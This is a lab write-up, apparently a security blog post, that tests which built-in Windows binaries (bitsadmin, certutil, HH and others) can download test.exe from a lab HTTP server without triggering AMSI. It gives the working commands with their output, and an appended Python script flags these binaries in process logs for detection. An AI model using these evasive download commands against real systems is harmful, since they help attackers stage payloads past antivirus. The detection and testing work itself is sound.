Recently Microsoft has started blocking the use of certutil to download files. There are, however, several other tools on Windows that you can use to download files from the internet. These are called Living Off the Land Binaries, or LOLBINs, because they are part of a standard Windows installation.

This is a rundown of all the tools that I know of that can download files on Windows using a current Windows version (Build 10.0.17134 rs4_release.180410-1804) with up-to-date Windows Defender and AMSI databases.

Setting up a lab

On a Kali Linux machine I am running a simple HTTP server using python -m SimpleHTTPServer 80, serving a single file, test.exe, for download.

In my test lab I have set up a Windows 10 machine and applied all the recent updates; I also let it update all the necessary Defender and AMSI databases.

The target is to download the file test.exe from the URL http://192.168.38.201/test.exe without triggering AMSI.

Finding Binaries and Scripts

The LOLBAS Project has a great overview of all the tools available on Windows by default that we can use to download, execute or dump files. The repository is continually updated, so keep a close eye on it if you are into such a thing (and who wouldn’t be?).

Let's get started.

Bitsadmin

Status: works

bitsadmin /create /download bitsadmin 
bitsadmin /addfile bitsadmin http://192.168.38.201/test.exe  c:\Users\vagrant\test.exe 
bitsadmin /RESUME bitsadmin
bitsadmin /complete bitsadmin

Result from running:

PS C:\Users\vagrant> bitsadmin /create /download bitsadmin

BITSADMIN version 3.0
BITS administration utility.
(C) Copyright Microsoft Corp.

Created job {9ABA2A9C-7DDE-4C27-AE40-43AA45C1D16A}.

PS C:\Users\vagrant> bitsadmin /addfile bitsadmin http://192.168.38.201/test.exe  c:\Users\vagrant\test.exe

BITSADMIN version 3.0
BITS administration utility.
(C) Copyright Microsoft Corp.

Added http://192.168.38.201/test.exe -> c:\Users\vagrant\test.exe to job.

PS C:\Users\vagrant> bitsadmin /RESUME bitsadmin

BITSADMIN version 3.0
BITS administration utility.
(C) Copyright Microsoft Corp.

Job resumed.

PS C:\Users\vagrant> bitsadmin /complete bitsadmin

BITSADMIN version 3.0
BITS administration utility.
(C) Copyright Microsoft Corp.

Job completed.

Certutil

Status: AMSI Alert

certutil.exe -urlcache -split -f http://192.168.38.201/test.exe c:\Users\vagrant\test.exe 

Result

At line:1 char:1
+ certutil.exe -urlcache -split -f http://192.168.38.201/test.exe c:\Us ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.
    + CategoryInfo          : ParserError: (:) [], ParentContainsErrorRecordException
    + FullyQualifiedErrorId : ScriptContainedMaliciousContent

Esentutl

Status: does not support HTTP

esentutl.exe /y http://192.168.38.201/test.exe /d c:\Users\vagrant\test.exe  /o

Result

PS C:\Users\vagrant> esentutl.exe /y http://192.168.38.201/test.exe /d c:\Users\vagrant\test.exe  /o

Initiating COPY FILE mode...
     Source File: http://192.168.38.201/test.exe
Destination File: c:\Users\vagrant\test.exe

                      Copy Progress (% complete)

          0    10   20   30   40   50   60   70   80   90  100
          |----|----|----|----|----|----|----|----|----|----|
          FAILURE: CreateFile:  (123), The filename, directory name, or volume label syntax is incorrect.

Operation terminated with error -1 (JET_wrnNyi, Function Not Yet Implemented) after 0.0 seconds.

Expand

Binary that expands one or more compressed files.

Status: does not support HTTP

expand http://192.168.38.201/test.exe c:\Users\vagrant\test.exe

Result

PS C:\Users\vagrant> expand http://192.168.38.201/test.exe c:\Users\vagrant\test.exe
Microsoft (R) File Expansion Utility
Copyright (c) Microsoft Corporation. All rights reserved.

Can't open input file: http://192.168.38.201/test.exe.

Extrac32

Status: does not support HTTP

extrac32 /Y /C http://192.168.38.201/test.exe c:\Users\vagrant\test.exe

Result

No output

Findstr

Status: does not support HTTP

findstr /V /L SOMETHINGELSE http://192.168.38.201/test.exe > c:\Users\vagrant\test.exe

Result

PS C:\Users\vagrant> findstr /V /L SOMETHINGELSE http://192.168.38.201/test.exe > c:\Users\vagrant\test.exe
FINDSTR: Cannot open http://192.168.38.201/test.exe

HH

Status: works, only GUI

HH.exe http://192.168.38.201/test.exe

Result

Pops up a GUI; the file is downloaded.

ieexec

Status: Not present in default install

makecab

Status: does not support HTTP

makecab http://192.168.38.201/test.exe c:\Users\vagrant\test.exe

Result

PS C:\Users\vagrant> makecab http://192.168.38.201/test.exe c:\Users\vagrant\test.exe
Cabinet Maker - Lossless Data Compression Tool

ERROR: Could not find file: http://192.168.38.201/test.exe

Replace

Status: does not support HTTP

replace http://192.168.38.201/test.exe c:\Users\vagrant\test.exe /A

Result

PS C:\Users\vagrant> replace http://192.168.38.201/test.exe c:\Users\vagrant\test.exe /A
Invalid switch - //192.168.38.201
No files replaced

Conclusion

So, from my quick tests it seems the only usable tools for transferring a file from an HTTP server are bitsadmin and HH. The other tools marked as “Download” in LOLBAS might also work, but only over SMB connections, which you might not have available.
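From the defender's side, the same list doubles as a detection table: a process-creation event where one of these binaries is handed an http(s) URL is worth an alert, with bitsadmin and HH ranked highest because they are the two that actually worked. The script below is an added example, not part of the original post; the command lines it scans are constructed to mirror the commands tested above, and the event format is assumed to be plain command-line strings as exported from Sysmon or 4688 logging.

```python
import re

# Outcome the post reported for each binary: only bitsadmin and hh fetched
# test.exe over HTTP; certutil tripped AMSI; the rest cannot open a URL.
LOLBIN_OUTCOME = {
    "bitsadmin.exe": "works",
    "hh.exe": "works (GUI)",
    "certutil.exe": "blocked by AMSI on the tested build",
}
for _exe in ("esentutl", "expand", "extrac32", "findstr", "makecab", "replace"):
    LOLBIN_OUTCOME[_exe + ".exe"] = "no HTTP support"

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
# bitsadmin only fetches once a URL is attached with /addfile or /transfer
BITS_FETCH_RE = re.compile(r"/(addfile|transfer)\b", re.IGNORECASE)


def image_name(cmdline):
    """Lower-case base name (with .exe) of the first token of a command line."""
    first = cmdline.strip().split(None, 1)[0].strip('"') if cmdline.strip() else ""
    exe = first.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    return exe if not exe or exe.endswith(".exe") else exe + ".exe"


def classify(cmdline):
    """Return (binary, url, outcome) when a tested LOLBIN is handed a URL, else None."""
    exe = image_name(cmdline)
    url = URL_RE.search(cmdline)
    if exe not in LOLBIN_OUTCOME or url is None:
        return None
    if exe == "bitsadmin.exe" and not BITS_FETCH_RE.search(cmdline):
        return None  # job creation alone carries no URL to fetch
    return exe, url.group(0), LOLBIN_OUTCOME[exe]


def scan(cmdlines):
    """Run classify over process-creation command lines, keeping the hits."""
    return [hit for hit in map(classify, cmdlines) if hit]


# Constructed sample command lines mirroring the commands tested in the post.
SAMPLE_CMDLINES = [
    "bitsadmin /create /download bitsadmin",
    "bitsadmin /addfile bitsadmin http://192.168.38.201/test.exe c:\\Users\\vagrant\\test.exe",
    "HH.exe http://192.168.38.201/test.exe",
    "certutil.exe -urlcache -split -f http://192.168.38.201/test.exe c:\\Users\\vagrant\\test.exe",
    "findstr /V /L SOMETHINGELSE c:\\temp\\notes.txt",
]

if __name__ == "__main__":
    for exe, url, outcome in scan(SAMPLE_CMDLINES):
        print("%-14s %-40s %s" % (exe, url, outcome))
```

Running it on the sample set reports the bitsadmin /addfile, HH and certutil lines and ignores the bare job creation and the local findstr call.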
